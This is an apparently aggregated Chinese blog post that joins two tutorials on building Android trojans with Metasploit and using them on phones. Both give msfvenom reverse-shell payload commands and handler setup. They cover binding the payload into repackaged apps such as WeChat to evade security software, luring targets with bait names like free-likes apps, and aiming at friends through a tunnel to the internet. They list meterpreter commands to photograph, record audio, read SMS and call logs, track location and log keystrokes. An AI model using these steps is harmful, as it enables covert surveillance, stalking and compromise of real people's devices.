Kali Linux使用MSF木马入侵安卓手机
Posted 黄胶鞋
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Kali Linux使用MSF木马入侵安卓手机相关的知识,希望对你有一定的参考价值。
声明:
- 本文章仅做娱乐和学习,切勿非法使用!!
- 本人技术一般,水平有限,如有不对请多多指正。
一、环境准备
- Kali Linux
- 安卓手机一部(安卓11)
二、内网穿透
要想玩的好,总不能本地玩自己吧,也得和周边朋友开个玩笑吧,所以就得做内网穿透了,免费内网穿透可以看这位大佬的
CSDN博主「Lisa Cpolar」
我这边用的是自己frp拿自己服务器做了内网穿透
三、木马生成并加到apk
直接用msf生成的apk打开没有内容,安装报毒,且目前的安卓11以上无法直接安装,
msfvenom -p android/meterpreter/reverse_tcp LHOST=<本地ip> LPORT=<本地端口号> R > <文件名>.apk
网上大部分都是生成后对apk反编译加马,加签名等等,这边用这位大佬的python工具直接给apk加马,把msf生成的安卓远控附加进普通的app中,并进行加固隐藏特征。可以绕过常见的手机安全管家。
大佬GItHub
使安装python3, Java环境.
使用python3生成apk文件, 需要指定msf远控链接的IP和端口.(本地的填本地kali的IP,做了内网穿透填穿透后的公网地址和端口)
python main.py --lhost 192.168.0.106 --lport 1433 -n ../微信_7.0.22.apk
三、使用msfconsole加载handler.rc进行服务端监听
加马完成后会在WorkDir文件夹下生成一个handler.rc文件,做了内网穿透的把此文件里面的ip改为kali机的IP,端口改为做kali本地监听公网的那个端口**(注意和上面那个端口的区别)**
然后使用msfconsole加载handler.rc进行服务端监听
msfconsole -r WorkDir/handler.rc
四、将apk发给目标机安装
请勿违法违规!
五、结束
对方安装点击就会被监听到,help命令查看
六、问题
现在手机基本都控制着不给权限,比如我用一个音乐软件只有存储和音频权限,只能截图,获取安装的软件列表,打开软件之类的,要是想控制摄像头就不行,软件也会报错,现在问题就是没办法主动获取权限,只能由用户授权,而且大佬的加马工具也不是所有软件都能成功。
能力有限,水平一般,希望有办法的大佬们指点一下。
Kali Linux利用MSF入侵安卓手机(小白版超详细)
Kali Linux利用MSF入侵安卓手机
一、什么是msf
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。
MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。
演示环境
使用Kali 2021.3进行演示操作
目标靶机: 模拟器逍遥 Android 7.1.2
软件:msfvenom、msfconsole(Kali系统内置)
二、渗透流程
1.进入管理员模式
命令: sudo su
解释: 不在管理员模式下运行可能会有权限不够的提示,为了避免命令执行失败,在管理员下运行以下命令
提示:执行命令之后输入Kali的密码,密码是被隐藏的,直接输入然后回车即可
2.生成可执行木马文件
命令: msfvenom -p android/meterpreter/reverse_tcp LHOST=<本地ip> LPORT=<本地端口号> R > <文件名>.apk
实例: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.32.1 LPORT=5555 R >Android.apk
解释: 本地ip写自己Kali的IP地址,用ifconfig就能查看自己Kali的IP地址
本地端口自己随便设置一个没有被占用的端口号,如果端口号被占用那么文件会生成失败,换一个端口号就性
文件名可以随便写自己喜欢的名字,比如写免费刷赞,可能更容易让目标主机上钩
这个就是Kali主机的IP地址
接下来运行命令生成木马
默认生成的文件在根目录下
把刚才生成的安卓后门放到目标靶机中去
3.运行msfconsole命令
命令: msfconsole
4.配置参数
(1)命令: use exploit/multi/handler
(选择模块)
(2)命令: set payload android/meterpreter/reverse_tcp
(选择攻击模块)
(3)命令: set LhOST 192.168.32.1
(填写自己主机的IP地址)
(4)命令: set lport 5555
(填写刚才生成文件时的端口号)
(5)命令: show options
(查看设置参数)
(6)命令: exploit -z -j
(后台执行)
参数设置好之后在靶机打开程序然后执行步骤6的命令,也可以直接输入命令
exploit
开始攻击,只要靶机安装了后门软件用什么方法都可以,直接run开始执行攻击也行
详细攻击配置参数演示:
现在等待靶机打开APP就可以了
5.在靶机打开可执行文件
我们这里也可以把这个程序伪装一下,把他的图标改一下,或者把它捆绑在某些软件上面,当用户打开就自动安装到对方电脑上面
6.查看用户
(1)命令: sessions
(查看上钩的用户)
(2)命令: sessions -i 1
(选择需要攻击的用户)
出现
meterpreter
你就已经成功的入侵成功
三、meterpreter入侵安卓手机命令
1.查看对方手机系统信息
命令: sysinfo
2.查看对方手机安装哪些app文件
命令: app_list
3.远程控制对方手机拍摄一张照片
命令: webcam_snap
4.远程控制对方手机开起视频聊天
命令: webcam_chat
5.实时查看对方手机的信息
命令: dump_sms
6.获取对方手机的通讯录
命令: dump_calllog
7.实时获取对方手机GPS定位
命令: geolocate
8.更多命令
还可以查看帮助文档,命令
help
cmd指令:
cat 读取文件内容到屏幕
cd 更改目录
checksum 检索文件的校验和
cp 将源复制到目标
del 删除指定文件
dir 列出文件(ls 的别名)
下载 下载文件或目录
编辑 编辑文件
getlwd 打印本地工作目录
getwd 打印工作目录
lcd 更改本地工作目录
lls 列出本地文件
lpwd 打印本地工作目录
ls 列出文件
mkdir 创建目录
mv 将源移动到目标
pwd 打印工作目录
rm 删除指定文件
rmdir 删除目录
search 搜索文件
show_mount 列出所有挂载点/逻辑驱动器
upload 上传文件或目录
pkill 按名称终止进程
meterpreter命令:
keyscan_start 开始捕获击键(开始键盘记录)
keyscan_dump 转储按键缓冲(下载键盘记录)
keyscan_stop 停止捕获击键(停止键盘记录)
record_mic X秒从默认的麦克风record_mic音频记录(音频录制)
webcam_chat 开始视频聊天(视频,对方会有弹窗)
webcam_list 单摄像头(查看摄像头列表)
webcam_snap 采取快照从指定的摄像头(摄像头拍摄一张照片)
webcam_stream 播放视频流从指定的摄像头(开启摄像头监控)
enumdesktops 列出所有可访问的桌面和窗口站(窗体列表)
getdesktop 得到当前的Meterpreter桌面
reboot 重新启动远程计算机
shutdown 关闭远程计算机
shell 放入系统命令 shell
enumdesktops 列出所有可访问的桌面和窗口站
getdesktop 获取当前的meterpreter桌面
idletime 返回远程用户空闲的秒数
keyboard_send 发送击键
keyevent 发送按键事件
keyscan_dump 转储击键缓冲区
keyscan_start 开始捕获击键
keyscan_stop 停止捕获击键
mouse 发送鼠标事件
screenshare 实时观看远程用户桌面
screenshot 抓取交互式桌面的屏幕截图
setdesktop 更改 Meterpreters 当前桌面
uictl 控制一些用户界面组件
record_mic 从默认麦克风录制音频 X 秒
webcam_chat 开始视频聊天
webcam_list 列出网络摄像头
webcam_snap 从指定的网络摄像头拍摄快照
webcam_stream 播放来自指定网络摄像头的视频流
play 在目标系统上播放波形音频文件 (.wav)
getsystem 尝试将您的权限提升到本地系统的权限
execute -f notepad 打开记事本
把文件上传到靶机命令
把文件下载到主机命令
以上是关于Kali Linux使用MSF木马入侵安卓手机的主要内容,如果未能解决你的问题,请参考以下文章